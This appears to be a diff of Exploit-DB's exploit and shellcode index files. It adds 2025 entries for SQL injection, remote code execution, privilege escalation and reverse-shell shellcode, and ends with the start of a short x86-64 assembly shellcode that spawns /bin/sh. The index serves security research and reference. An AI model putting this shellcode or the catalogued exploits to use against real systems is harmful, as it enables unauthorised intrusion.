29439,exploits/multiple/remote/29439.txt,"iPlanet Web Server 4.1 - Search Module Cross-Site Scripting",2007-01-09,Khalsa,remote,multiple,,2007-01-09,2013-11-04,1,CVE-2007-0183;OSVDB-32662,,,,,https://www.securityfocus.com/bid/21977/info
@ -11523,6 +11538,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
27931,exploits/multiple/remote/27931.txt,"Snort 2.4.x - URIContent Rules Detection Evasion",2006-05-31,"Blake Hartstein",remote,multiple,,2006-05-31,2013-08-29,1,CVE-2006-2769;OSVDB-25837,,,,,https://www.securityfocus.com/bid/18200/info
21029,exploits/multiple/remote/21029.pl,"Softek MailMarshal 4 / Trend Micro ScanMail 1.0 - SMTP Attachment Protection Bypass",2001-07-25,"Aidan O'Kelly",remote,multiple,,2001-07-25,2012-09-03,1,OSVDB-88584;OSVDB-88583,,,,,https://www.securityfocus.com/bid/3097/info
16324,exploits/multiple/remote/16324.rb,"Solaris Sadmind - Command Execution (Metasploit)",2010-06-22,Metasploit,remote,multiple,,2010-06-22,2016-10-27,1,CVE-2003-0722;OSVDB-4585,"Metasploit Framework (MSF)",,,,
52311,exploits/multiple/remote/52311.py,"SolarWinds Serv-U 15.4.2 HF1 - Directory Traversal",2025-05-29,İbrahimsql,remote,multiple,,2025-05-29,2025-05-29,0,CVE-2024-28995,,,,,
36537,exploits/multiple/remote/36537.txt,"SonicWALL AntiSpam & EMail 7.3.1 - Multiple Vulnerabilities",2012-01-10,"Benjamin Kunz Mejri",remote,multiple,,2012-01-10,2016-12-18,1,,,,,,https://www.securityfocus.com/bid/51337/info
31756,exploits/multiple/remote/31756.txt,"SonicWALL Email Security 6.1.1 - Error Page Cross-Site Scripting",2008-05-08,"Deniz Cevik",remote,multiple,,2008-05-08,2014-02-19,1,CVE-2008-2162;OSVDB-45017,,,,,https://www.securityfocus.com/bid/29107/info
24322,exploits/multiple/remote/24322.rb,"SonicWALL Gms 6 - Arbitrary File Upload (Metasploit)",2013-01-24,Metasploit,remote,multiple,,2013-01-24,2013-01-24,1,CVE-2013-1359;OSVDB-89347,"Metasploit Framework (MSF)",,,,
@ -11827,6 +11843,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
48145,exploits/multiple/webapps/48145.py,"Cacti 1.2.8 - Unauthenticated Remote Code Execution",2020-02-03,Askar,webapps,multiple,,2020-02-27,2020-02-27,0,CVE-2020-8813,,,,,https://github.com/mhaskar/CVE-2020-8813/blob/dfb48378f39249ff54ecf24ccd3b89db26971ccf/Cacti-preauth-rce.py
52067,exploits/multiple/webapps/52067.txt,"Calibre-web 0.6.21 - Stored XSS",2024-08-23,"Catalin Iovita_ Alexandru Postolache",webapps,multiple,,2024-08-23,2024-08-23,0,,,,,,
18430,exploits/multiple/webapps/18430.txt,"Campaign Enterprise 11.0.421 - SQL Injection",2012-01-30,"Craig Freyman",webapps,multiple,,2012-01-30,2012-01-30,0,OSVDB-78888,,,,,
52312,exploits/multiple/webapps/52312.txt,"Campcodes Online Hospital Management System 1.0 - SQL Injection",2025-05-29,"Carine Constantino",webapps,multiple,,2025-05-29,2025-05-29,0,CVE-2025-5298,,,,,
18247,exploits/multiple/webapps/18247.txt,"Capexweb 1.1 - SQL Injection",2011-12-16,"D1rt3 Dud3",webapps,multiple,,2011-12-16,2011-12-16,1,OSVDB-77998;CVE-2011-5031,,,,,
50792,exploits/multiple/webapps/50792.go,"Casdoor 1.13.0 - SQL Injection (Unauthenticated)",2022-02-28,"Mayank Deshmukh",webapps,multiple,,2022-02-28,2022-02-28,0,CVE-2022-24124,,,,,
48553,exploits/multiple/webapps/48553.txt,"Cayin Content Management Server 11.0 - Remote Command Injection (root)",2020-06-04,LiquidWorm,webapps,multiple,,2020-06-04,2020-06-04,0,,,,,,
@ -12090,6 +12107,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
24573,exploits/multiple/webapps/24573.txt,"Keene Digital Media Server 1.0.2 - Cross-Site Scripting",2004-09-04,dr_insane,webapps,multiple,,2004-09-04,2013-03-04,1,,,,,,https://www.securityfocus.com/bid/11111/info
36609,exploits/multiple/webapps/36609.txt,"Kemp Load Master 7.1.16 - Multiple Vulnerabilities",2015-04-02,"Roberto Suggi Liverani",webapps,multiple,80,2015-04-02,2015-04-02,0,CVE-2014-7910;CVE-2014-7227;CVE-2014-7196;CVE-2014-7169;CVE-2014-62771;CVE-2014-6271;CVE-2014-5288;CVE-2014-5287;CVE-2014-3671;OSVDB-120255;CVE-2014-3659;OSVDB-120254;OSVDB-120253;OSVDB-120252;OSVDB-120251;OSVDB-120250;OSVDB-120249;OSVDB-112004,,,,,
42090,exploits/multiple/webapps/42090.txt,"KEMP LoadMaster 7.135.0.13245 - Persistent Cross-Site Scripting / Remote Code Execution",2017-05-30,SecuriTeam,webapps,multiple,,2017-05-30,2017-05-30,0,,,,,,
52290,exploits/multiple/webapps/52290.py,"Kentico Xperience 13.0.178 - Cross Site Scripting (XSS)",2025-05-13,"Alex Messham",webapps,multiple,,2025-05-13,2025-05-13,0,CVE-2025-32370,,,,,
14629,exploits/multiple/webapps/14629.html,"Kleeja Upload - Cross-Site Request Forgery (Change Admin Password)",2010-08-12,"KOLTN S",webapps,multiple,80,2010-08-12,2010-09-08,0,OSVDB-67094,,,,,
44487,exploits/multiple/webapps/44487.txt,"Kodi 17.6 - Persistent Cross-Site Scripting",2018-04-18,"Manuel García Cárdenas",webapps,multiple,,2018-04-18,2018-04-18,0,CVE-2018-8831,"Cross-Site Scripting (XSS)",,,,
50521,exploits/multiple/webapps/50521.py,"KONGA 0.14.9 - Privilege Escalation",2021-11-15,"Fabricio Salomao",webapps,multiple,,2021-11-15,2021-11-15,0,,,,,http://www.exploit-db.comkonga-0.14.9.zip,
@ -12494,6 +12512,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
52248,exploits/multiple/webapps/52248.txt,"WooCommerce Customers Manager 29.4 - Post-Authenticated SQL Injection",2025-04-16,"Ivan Spiridonov",webapps,multiple,,2025-04-16,2025-04-16,0,CVE-2024-0399,,,,,
47690,exploits/multiple/webapps/47690.md,"WordPress Core < 5.2.3 - Viewing Unauthenticated/Password/Private Posts",2019-10-14,"Sebastian Neef",webapps,multiple,,2019-11-19,2019-11-19,0,CVE-2019-17671,,,,,https://0day.work/proof-of-concept-for-wordpress-5-2-3-viewing-unauthenticated-posts/
52285,exploits/multiple/webapps/52285.py,"WordPress Depicter Plugin 3.6.1 - SQL Injection",2025-05-09,"Andrew Long",webapps,multiple,,2025-05-09,2025-05-09,0,CVE-2025-2011,,,,,https://github.com/datagoboom/CVE-2025-2011
52307,exploits/multiple/webapps/52307.txt,"WordPress Digits Plugin 8.4.6.1 - Authentication Bypass via OTP Bruteforcing",2025-05-29,"Saleh Tarawneh",webapps,multiple,,2025-05-29,2025-05-29,0,CVE-2025-4094,,,,,
52291,exploits/multiple/webapps/52291.py,"WordPress Frontend Login and Registration Blocks Plugin 1.0.7 - Privilege Escalation",2025-05-13,"Md Shoriful Islam",webapps,multiple,,2025-05-13,2025-05-13,0,CVE-2025-3605,,,,,
49189,exploits/multiple/webapps/49189.txt,"Wordpress Plugin Canto 1.3.0 - Blind SSRF (Unauthenticated)",2020-12-04,"Pankaj Verma",webapps,multiple,,2020-12-04,2020-12-04,0,CVE-2020-28976;CVE-2020-28977;CVE-2020-28978,,,,,
48919,exploits/multiple/webapps/48919.txt,"WordPress Plugin Colorbox Lightbox v1.1.1 - Persistent Cross-Site Scripting (Authenticated)",2020-10-20,n1x_,webapps,multiple,,2020-10-20,2020-10-20,0,,,,,,
36930,exploits/multiple/webapps/36930.txt,"WordPress Plugin Freshmail 1.5.8 - SQL Injection",2015-05-07,"Felipe Molina",webapps,multiple,,2015-05-07,2015-05-07,0,OSVDB-121843,"WordPress Plugin",,,http://www.exploit-db.comfreshmail-newsletter.1.5.8.zip,
@ -12501,6 +12521,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
49252,exploits/multiple/webapps/49252.txt,"WordPress Plugin Total Upkeep 1.14.9 - Database and Files Backup Download",2020-12-14,Wadeek,webapps,multiple,,2020-12-14,2020-12-14,0,,,,,,
33937,exploits/multiple/webapps/33937.txt,"WordPress Plugin TYPO3 't3m_cumulus_tagcloud' Extension 1.0 - HTML Injection / Cross-Site Scripting",2010-05-05,MustLive,webapps,multiple,,2010-05-05,2016-09-26,1,,,,,,https://www.securityfocus.com/bid/39926/info
52137,exploits/multiple/webapps/52137.txt,"WordPress User Registration & Membership Plugin 4.1.1 - Unauthenticated Privilege Escalation",2025-04-08,"Al Baradi Joy",webapps,multiple,,2025-04-08,2025-04-08,0,,,,,,
52302,exploits/multiple/webapps/52302.py,"WordPress User Registration & Membership Plugin 4.1.2 - Authentication Bypass",2025-05-25,"Mohammed Idrees Banyamer",webapps,multiple,,2025-05-25,2025-05-25,0,CVE-2025-2594,,,,,
37573,exploits/multiple/webapps/37573.txt,"Worksforweb iAuto - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2012-08-06,"Benjamin Kunz Mejri",webapps,multiple,,2012-08-06,2015-07-11,1,,,,,,https://www.securityfocus.com/bid/54812/info
40134,exploits/multiple/webapps/40134.html,"Wowza Streaming Engine 4.5.0 - Cross-Site Request Forgery (Add Advanced Admin)",2016-07-20,LiquidWorm,webapps,multiple,8088,2016-07-20,2016-07-20,0,,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5341.php
40135,exploits/multiple/webapps/40135.txt,"Wowza Streaming Engine 4.5.0 - Multiple Cross-Site Scripting Vulnerabilities",2016-07-20,LiquidWorm,webapps,multiple,8088,2016-07-20,2016-07-20,0,,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5343.php
@ -16114,6 +16135,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
11162,exploits/php/webapps/11162.txt,"CLONEBID B2B Marketplace - Multiple Vulnerabilities",2010-01-16,"Hamza 'MizoZ' N.",webapps,php,,2010-01-15,,1,OSVDB-61811,,,,,
47544,exploits/php/webapps/47544.py,"ClonOs WEB UI 19.09 - Improper Access Control",2019-10-25,"İbrahim Hakan Şeker",webapps,php,,2019-10-25,2019-10-25,0,CVE-2019-18418,,,,,
30070,exploits/php/webapps/30070.html,"ClonusWiki 0.5 - 'index.php' HTML Injection",2007-05-22,"John Martinelli",webapps,php,,2007-05-22,2013-12-06,1,,,,,,https://www.securityfocus.com/bid/24101/info
52314,exploits/php/webapps/52314.txt,"CloudClassroom PHP Project 1.0 - SQL Injection",2025-06-05,"Sanjay Singh",webapps,php,,2025-06-05,2025-06-05,0,CVE-2025-45542,,,,,
19549,exploits/php/webapps/19549.txt,"CLscript Classified Script 3.0 - SQL Injection",2012-07-03,"Daniel Godoy",webapps,php,,2012-07-03,2012-07-03,0,OSVDB-83690,,,,,
19600,exploits/php/webapps/19600.txt,"CLscript CMS 3.0 - Multiple Vulnerabilities",2012-07-05,Vulnerability-Lab,webapps,php,,2012-07-05,2012-07-05,0,OSVDB-84678;OSVDB-84677;OSVDB-84676;OSVDB-84675;OSVDB-84674;OSVDB-84673,,,,,https://www.vulnerability-lab.com/get_content.php?id=574
12423,exploits/php/webapps/12423.txt,"CLScript.com Classifieds Software - SQL Injection",2010-04-27,41.w4r10,webapps,php,,2010-04-26,,1,OSVDB-64098;CVE-2010-1660,,,,,
@ -41368,6 +41390,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
6705,exploits/windows/local/6705.txt,"Microsoft Windows Server 2003 - Token Kidnapping Local Privilege Escalation",2008-10-08,"Cesar Cerrudo",local,windows,,2008-10-07,2018-12-18,1,,,2008-Churrasco.zip,,,
35936,exploits/windows/local/35936.py,"Microsoft Windows Server 2003 SP2 - Local Privilege Escalation (MS14-070)",2015-01-29,KoreLogic,local,windows,,2015-01-29,2015-01-29,0,CVE-2014-4076;OSVDB-114532;MS14-070,,,,,
37755,exploits/windows/local/37755.c,"Microsoft Windows Server 2003 SP2 - TCP/IP IOCTL Privilege Escalation (MS14-070)",2015-08-12,"Tomislav Paskalev",local,windows,,2015-08-15,2016-10-27,0,CVE-2014-4076;OSVDB-114532;MS14-070,,,http://www.exploit-db.com/screenshots/idlt38000/ms14-070.jpg,,
52301,exploits/windows/local/52301.c,"Microsoft Windows Server 2016 - Win32k Elevation of Privilege",2025-05-25,"Milad karimi",local,windows,,2025-05-25,2025-05-25,0,CVE-2023-29336,,,,,
43962,exploits/windows/local/43962.c,"Microsoft Windows Subsystem for Linux - 'execve()' Local Privilege Escalation",2018-02-02,"Saar Amar",local,windows,,2018-02-02,2018-02-02,1,CVE-2018-0743,Local,,,,https://raw.githubusercontent.com/saaramar/execve_exploit/master/exploit.c
353,exploits/windows/local/353.c,"Microsoft Windows Task Scheduler (XP/2000) - '.job' (MS04-022)",2004-07-18,anonymous,local,windows,,2004-07-17,2019-03-28,1,OSVDB-7798;CVE-2004-0212;MS04-022,,,,,
38200,exploits/windows/local/38200.txt,"Microsoft Windows Task Scheduler - 'DeleteExpiredTaskAfter' File Deletion Privilege Escalation",2015-09-15,"Google Security Research",local,windows,,2015-09-15,2015-09-15,1,CVE-2015-2525;OSVDB-127204,,,,,https://code.google.com/p/google-security-research/issues/detail?id=442
@ -44727,6 +44750,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
2355,exploits/windows/remote/2355.pm,"Microsoft Windows Server 2003 - NetpIsRemote() Remote Overflow (MS06-040) (Metasploit)",2006-09-13,"Trirat Puttaraksa",remote,windows,445,2006-09-12,,1,OSVDB-27845;CVE-2006-3439;MS06-040,"Metasploit Framework (MSF)",,,,
47558,exploits/windows/remote/47558.py,"Microsoft Windows Server 2012 - 'Group Policy' Remote Code Execution (MS15-011)",2019-10-29,"Thomas Zuk",remote,windows,,2019-10-29,2020-12-11,0,CVE-2015-0008,,,,,
47559,exploits/windows/remote/47559.py,"Microsoft Windows Server 2012 - 'Group Policy' Security Feature Bypass (MS15-014)",2019-10-29,"Thomas Zuk",remote,windows,,2019-10-29,2020-12-11,0,CVE-2015-0009,,,,,
52315,exploits/windows/remote/52315.py,"Microsoft Windows Server 2025 JScript Engine - Remote Code Execution (RCE)",2025-06-05,"Mohammed Idrees Banyamer",remote,windows,,2025-06-05,2025-06-05,0,CVE-2025-30397,,,,,
28482,exploits/windows/remote/28482.rb,"Microsoft Windows Theme File Handling - Arbitrary Code Execution (MS13-071) (Metasploit)",2013-09-23,Metasploit,remote,windows,,2013-09-23,2013-09-23,1,CVE-2013-0810;OSVDB-97136;MS13-071,"Metasploit Framework (MSF)",,,,
46220,exploits/windows/remote/46220.txt,"Microsoft Windows VCF or Contact' File - URL Manipulation-Spoof Arbitrary Code Execution",2019-01-22,"Eduardo Braun Prado",remote,windows,,2019-01-22,2019-01-22,0,,,,,,
34931,exploits/windows/remote/34931.c,"Microsoft Windows Vista - 'lpksetup.exe oci.dll' DLL Loading Arbitrary Code Execution",2010-10-25,"Tyler Borland",remote,windows,,2010-10-25,2014-10-10,1,,,,,,https://www.securityfocus.com/bid/44414/info
@ -45350,6 +45374,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
34668,exploits/windows/remote/34668.txt,"Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (1)",2014-09-15,"Daniele Linguaglossa",remote,windows,80,2014-09-15,2016-10-10,1,CVE-2014-6287;OSVDB-111386,,,http://www.exploit-db.com/screenshots/idlt35000/screen-shot-2014-10-28-at-91538-am.png,http://www.exploit-db.comhfs2.3_288.zip,
39161,exploits/windows/remote/39161.py,"Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (2)",2016-01-04,"Avinash Thapa",remote,windows,,2016-01-04,2016-05-09,1,CVE-2014-6287;OSVDB-111386,,,,http://www.exploit-db.comhfs2.3c.src.zip,
49599,exploits/windows/remote/49599.py,"Remote Desktop Web Access - Authentication Timing Attack (Metasploit Module)",2021-02-26,"Matthew Dunn",remote,windows,,2021-02-26,2021-02-26,0,,,,,,
52299,exploits/windows/remote/52299.py,"Remote Keyboard Desktop 1.0.1 - Remote Code Execution (RCE)",2025-05-21,"Chokri Hammedi",remote,windows,,2025-05-21,2025-05-21,0,,,,,,
46697,exploits/windows/remote/46697.py,"RemoteMouse 3.008 - Arbitrary Remote Command Execution",2019-04-15,0rphon,remote,windows,,2019-04-15,2021-01-08,1,,Remote,,http://www.exploit-db.com/screenshots/idlt47000/image.png,http://www.exploit-db.comRemoteMouse.exe,
1565,exploits/windows/remote/1565.pl,"RevilloC MailServer 1.21 - 'USER' Remote Buffer Overflow",2006-03-07,"securma massine",remote,windows,110,2006-03-06,,1,OSVDB-23735;CVE-2006-1124,,,,,
16775,exploits/windows/remote/16775.rb,"RhinoSoft Serv-U FTP Server - Session Cookie Buffer Overflow (Metasploit)",2010-03-10,Metasploit,remote,windows,,2010-03-10,2016-09-27,1,CVE-2009-4006;OSVDB-59772,"Metasploit Framework (MSF)",,,,
@ -45926,6 +45951,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
41073,exploits/windows/remote/41073.py,"WinaXe Plus 8.7 - Remote Buffer Overflow",2017-01-16,"Peter Baris",remote,windows,,2017-01-16,2017-01-16,1,,,,http://www.exploit-db.com/screenshots/idlt41500/screen-shot-2017-01-16-at-152056.png,http://www.exploit-db.comwinaxep.exe,
16335,exploits/windows/remote/16335.rb,"WinComLPD 3.0.2 - Remote Buffer Overflow (Metasploit)",2010-06-22,Metasploit,remote,windows,,2010-06-22,2011-03-06,1,CVE-2008-5159;OSVDB-42861,"Metasploit Framework (MSF)",,,,
51575,exploits/windows/remote/51575.txt,"Windows 10 v21H1 - HTTP Protocol Stack Remote Code Execution",2023-07-07,nu11secur1ty,remote,windows,,2023-07-07,2023-07-07,0,CVE-2022-21907,,,,,
52300,exploits/windows/remote/52300.py,"Windows 2024.15 - Unauthenticated Desktop Screenshot Capture",2025-05-25,"Chokri Hammedi",remote,windows,,2025-05-25,2025-05-25,0,CVE-n/a,,,,,
52310,exploits/windows/remote/52310.py,"Windows File Explorer Windows 11 (23H2) - NTLM Hash Disclosure",2025-05-29,"Mohammed Idrees Banyamer",remote,windows,,2025-05-29,2025-05-29,0,CVE-2025-24071,,,,,
30169,exploits/windows/remote/30169.txt,"WindowsPT 1.2 - User ID Key Spoofing",2007-06-11,nnposter,remote,windows,,2007-06-11,2013-12-10,1,CVE-2007-3201;OSVDB-41727,,,,,https://www.securityfocus.com/bid/24412/info
16529,exploits/windows/remote/16529.rb,"WinDVD7 - 'IASystemInfo.dll' ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,remote,windows,,2010-05-09,2011-03-10,1,CVE-2007-0348;OSVDB-34315,"Metasploit Framework (MSF)",,,,
7875,exploits/windows/remote/7875.pl,"WinFTP Server 2.3.0 - 'LIST' (Authenticated) Remote Buffer Overflow",2009-01-26,"joe walko",remote,windows,21,2009-01-25,2016-09-27,1,OSVDB-51667;CVE-2009-0351,,,,,



@ -630,6 +630,7 @@ id,file,description,date_published,author,type,platform,size,date_added,date_upd
17371,shellcodes/linux_x86/17371.c,"Linux/x86 - Reverse (localhost:8080/TCP) Shell + SSL Shellcode (422 bytes)",2011-06-08,"Jonathan Salwan",,linux_x86,422,2011-06-08,2018-01-17,1,,,,,,http://shell-storm.org/shellcode/files/shellcode-770.php
43674,shellcodes/linux_x86/43674.c,"Linux/x86 - Reverse (www.netric.org:45295/TCP) Shell (/bin/sh) Shellcode (131 bytes)",2009-01-01,eSDee,,linux_x86,131,2018-01-17,2018-01-17,0,,,,,,http://shell-storm.org/shellcode/files/shellcode-552.php
13340,shellcodes/linux_x86/13340.c,"Linux/x86 - Reverse PHP (Writes To /var/www/cb.php On The Filesystem) Shell Shellcode (508 bytes)",2008-08-18,GS2008,,linux_x86,508,2008-08-17,2017-07-04,1,,,,,,http://shell-storm.org/shellcode/files/shellcode-208.php
52297,shellcodes/linux_x86/52297.c,"Linux/x86 - Reverse TCP Shellcode (95 bytes)",2025-05-21,"Al Baradi Joy",,linux_x86,95,2025-05-21,2025-05-21,0,,,,,,
35519,shellcodes/linux_x86/35519.c,"Linux/x86 - rmdir() Shellcode (37 bytes)",2014-12-11,kw4,,linux_x86,37,2014-12-30,2014-12-30,0,,,,,,
43691,shellcodes/linux_x86/43691.c,"Linux/x86 - rmdir(/tmp/willdeleted) Shellcode (41 bytes)",2010-05-31,gunslinger_,,linux_x86,41,2018-01-17,2018-01-17,0,,,,,,http://shell-storm.org/shellcode/files/shellcode-633.php
18379,shellcodes/linux_x86/18379.c,"Linux/x86 - Search For '.PHP'/'.HTML' Writable Files + Add Code Shellcode (380+ bytes)",2012-01-17,rigan,,linux_x86,380,2012-01-17,2017-08-24,1,,,,,,http://shell-storm.org/shellcode/files/shellcode-799.php
@ -820,6 +821,7 @@ id,file,description,date_published,author,type,platform,size,date_added,date_upd
41498,shellcodes/linux_x86-64/41498.nasm,"Linux/x64 - setuid(0) + execve(/bin/sh) + Polymorphic Shellcode (31 bytes)",2017-03-03,"Robert L. Taylor",,linux_x86-64,31,2017-03-03,2017-08-24,0,,,,,,
13320,shellcodes/linux_x86-64/13320.c,"Linux/x64 - setuid(0) + execve(/bin/sh) Shellcode (49 bytes)",2009-05-14,evil.xi4oyu,,linux_x86-64,49,2009-05-13,2017-07-04,1,,,,,,http://shell-storm.org/shellcode/files/shellcode-77.php
47183,shellcodes/linux_x86-64/47183.c,"Linux/x86 - execve(/bin/sh) + NOT +SHIFT-N+ XOR-N Encoded Shellcode (168 bytes)",2019-07-29,"Pedro Cabral",,linux_x86-64,168,2019-07-29,2019-08-01,0,,,,,,
52296,shellcodes/linux_x86-64/52296.asm,"Linux/x86-64 - execve(_/bin/sh_) Shellcode (36 bytes)",2025-05-21,"Sayan Ray",,linux_x86-64,36,2025-05-21,2025-05-21,0,,,,,,
51258,shellcodes/linux_x86-64/51258.txt,"Linux/x86_64 - bash Shellcode with xor encoding",2023-04-05,"Jeenika Anadani",,linux_x86-64,71,2023-04-05,2023-04-05,0,,,,,,
47290,shellcodes/linux_x86-64/47290.c,"Linux/x86_64 - Bind (4444/TCP) Shell (/bin/sh) + Password (pass) Shellcode (129 bytes)",2019-08-19,"Gonçalo Ribeiro",,linux_x86-64,129,2019-08-19,2019-08-20,0,,,,,,
46979,shellcodes/linux_x86-64/46979.c,"Linux/x86_64 - Bind (4444/TCP) Shell (/bin/sh) Shellcode (104 bytes)",2019-06-10,"Aron Mihaljevic",,linux_x86-64,104,2019-06-10,2019-06-10,0,,,,,,
@ -1039,6 +1041,7 @@ id,file,description,date_published,author,type,platform,size,date_added,date_upd
50368,shellcodes/windows_x86/50368.c,"Windows/x86 - WinExec PopCalc PEB & Export Directory Table NullFree Dynamic Shellcode (178 bytes)",2021-10-01,"Daniel Ortiz",,windows_x86,,2021-10-01,2021-10-29,0,,,,,,
39900,shellcodes/windows_x86/39900.c,"Windows/x86 - WinExec(_cmd.exe__0) Shellcode (184 bytes)",2016-06-07,"Roziul Hasan Khan Shifat",,windows_x86,184,2016-06-07,2016-09-05,0,,,,,,
14288,shellcodes/windows_x86/14288.asm,"Windows/x86 - Write-to-file ('pwned' ./f.txt) + Null-Free Shellcode (278 bytes)",2010-07-09,"Brett Gervasoni",,windows_x86,278,2010-07-09,2017-08-24,1,CVE-2010-0425,,,,,http://shell-storm.org/shellcode/files/shellcode-681.php
52298,shellcodes/windows_x86-64/52298.py,"Windows 11 x64 - Reverse TCP Shellcode (564 bytes)",2025-05-21,"Victor Huerlimann",,windows_x86-64,564,2025-05-21,2025-05-21,0,,,,,,
41827,shellcodes/windows_x86-64/41827.asm,"Windows/x64 (10) - Egghunter Shellcode (45 bytes)",2017-04-06,"Peter Baris",,windows_x86-64,45,2017-04-06,2017-04-06,0,,,,,,
45293,shellcodes/windows_x86-64/45293.c,"Windows/x64 (10) - WoW64 Egghunter (w00tw00t) Shellcode (50 bytes)",2018-08-29,n30m1nd,,windows_x86-64,50,2018-08-29,2018-09-08,0,,,,,,
37895,shellcodes/windows_x86-64/37895.asm,"Windows/x64 (2003) - Token Stealing Shellcode (59 bytes)",2015-08-20,"Fitzl Csaba",,windows_x86-64,59,2015-08-20,2015-08-20,0,,,,,,

1 id file description date_published author type platform size date_added date_updated verified codes tags aliases screenshot_url application_url source_url
630 17371 shellcodes/linux_x86/17371.c Linux/x86 - Reverse (localhost:8080/TCP) Shell + SSL Shellcode (422 bytes) 2011-06-08 Jonathan Salwan linux_x86 422 2011-06-08 2018-01-17 1 http://shell-storm.org/shellcode/files/shellcode-770.php
631 43674 shellcodes/linux_x86/43674.c Linux/x86 - Reverse (www.netric.org:45295/TCP) Shell (/bin/sh) Shellcode (131 bytes) 2009-01-01 eSDee linux_x86 131 2018-01-17 2018-01-17 0 http://shell-storm.org/shellcode/files/shellcode-552.php
632 13340 shellcodes/linux_x86/13340.c Linux/x86 - Reverse PHP (Writes To /var/www/cb.php On The Filesystem) Shell Shellcode (508 bytes) 2008-08-18 GS2008 linux_x86 508 2008-08-17 2017-07-04 1 http://shell-storm.org/shellcode/files/shellcode-208.php
633 52297 shellcodes/linux_x86/52297.c Linux/x86 - Reverse TCP Shellcode (95 bytes) 2025-05-21 Al Baradi Joy linux_x86 95 2025-05-21 2025-05-21 0
634 35519 shellcodes/linux_x86/35519.c Linux/x86 - rmdir() Shellcode (37 bytes) 2014-12-11 kw4 linux_x86 37 2014-12-30 2014-12-30 0
635 43691 shellcodes/linux_x86/43691.c Linux/x86 - rmdir(/tmp/willdeleted) Shellcode (41 bytes) 2010-05-31 gunslinger_ linux_x86 41 2018-01-17 2018-01-17 0 http://shell-storm.org/shellcode/files/shellcode-633.php
636 18379 shellcodes/linux_x86/18379.c Linux/x86 - Search For '.PHP'/'.HTML' Writable Files + Add Code Shellcode (380+ bytes) 2012-01-17 rigan linux_x86 380 2012-01-17 2017-08-24 1 http://shell-storm.org/shellcode/files/shellcode-799.php
821 41498 shellcodes/linux_x86-64/41498.nasm Linux/x64 - setuid(0) + execve(/bin/sh) + Polymorphic Shellcode (31 bytes) 2017-03-03 Robert L. Taylor linux_x86-64 31 2017-03-03 2017-08-24 0
822 13320 shellcodes/linux_x86-64/13320.c Linux/x64 - setuid(0) + execve(/bin/sh) Shellcode (49 bytes) 2009-05-14 evil.xi4oyu linux_x86-64 49 2009-05-13 2017-07-04 1 http://shell-storm.org/shellcode/files/shellcode-77.php
823 47183 shellcodes/linux_x86-64/47183.c Linux/x86 - execve(/bin/sh) + NOT +SHIFT-N+ XOR-N Encoded Shellcode (168 bytes) 2019-07-29 Pedro Cabral linux_x86-64 168 2019-07-29 2019-08-01 0
824 52296 shellcodes/linux_x86-64/52296.asm Linux/x86-64 - execve(_/bin/sh_) Shellcode (36 bytes) 2025-05-21 Sayan Ray linux_x86-64 36 2025-05-21 2025-05-21 0
825 51258 shellcodes/linux_x86-64/51258.txt Linux/x86_64 - bash Shellcode with xor encoding 2023-04-05 Jeenika Anadani linux_x86-64 71 2023-04-05 2023-04-05 0
826 47290 shellcodes/linux_x86-64/47290.c Linux/x86_64 - Bind (4444/TCP) Shell (/bin/sh) + Password (pass) Shellcode (129 bytes) 2019-08-19 Gonçalo Ribeiro linux_x86-64 129 2019-08-19 2019-08-20 0
827 46979 shellcodes/linux_x86-64/46979.c Linux/x86_64 - Bind (4444/TCP) Shell (/bin/sh) Shellcode (104 bytes) 2019-06-10 Aron Mihaljevic linux_x86-64 104 2019-06-10 2019-06-10 0
1041 50368 shellcodes/windows_x86/50368.c Windows/x86 - WinExec PopCalc PEB & Export Directory Table NullFree Dynamic Shellcode (178 bytes) 2021-10-01 Daniel Ortiz windows_x86 2021-10-01 2021-10-29 0
1042 39900 shellcodes/windows_x86/39900.c Windows/x86 - WinExec(_cmd.exe__0) Shellcode (184 bytes) 2016-06-07 Roziul Hasan Khan Shifat windows_x86 184 2016-06-07 2016-09-05 0
1043 14288 shellcodes/windows_x86/14288.asm Windows/x86 - Write-to-file ('pwned' ./f.txt) + Null-Free Shellcode (278 bytes) 2010-07-09 Brett Gervasoni windows_x86 278 2010-07-09 2017-08-24 1 CVE-2010-0425 http://shell-storm.org/shellcode/files/shellcode-681.php
1044 52298 shellcodes/windows_x86-64/52298.py Windows 11 x64 - Reverse TCP Shellcode (564 bytes) 2025-05-21 Victor Huerlimann windows_x86-64 564 2025-05-21 2025-05-21 0
1045 41827 shellcodes/windows_x86-64/41827.asm Windows/x64 (10) - Egghunter Shellcode (45 bytes) 2017-04-06 Peter Baris windows_x86-64 45 2017-04-06 2017-04-06 0
1046 45293 shellcodes/windows_x86-64/45293.c Windows/x64 (10) - WoW64 Egghunter (w00tw00t) Shellcode (50 bytes) 2018-08-29 n30m1nd windows_x86-64 50 2018-08-29 2018-09-08 0
1047 37895 shellcodes/windows_x86-64/37895.asm Windows/x64 (2003) - Token Stealing Shellcode (59 bytes) 2015-08-20 Fitzl Csaba windows_x86-64 59 2015-08-20 2015-08-20 0


@ -0,0 +1,31 @@
# Exploit Title: Linux/x86-64 execve("/bin/sh") Shellcode (36 bytes)
# Date: 2025-03-23
# Exploit Author: Sayan Ray [@barebones90]
# Tested on: Linux x86-64
# CVE: N/A
; P0P SH311 execve ("/bin/sh", NULL, NULL)
GLOBAL _start
section .text
_start:
xor rax, rax
push rax
mov r10, 0x68732f6e69622f ; hs/nib/
push r10
mov rdi, rsp ; rdi points to the string "/bin/sh" from the stack
; ( const char *pathname )
; Calling execve
mov rax, 0x3b ; 59 [execve syscall]
mov rsi, 0 ; NULL ( char *const _Nullable argv[] )
mov rdx, 0 ; NULL ( char *const _Nullable envp[] )
syscall
; Shellcode:
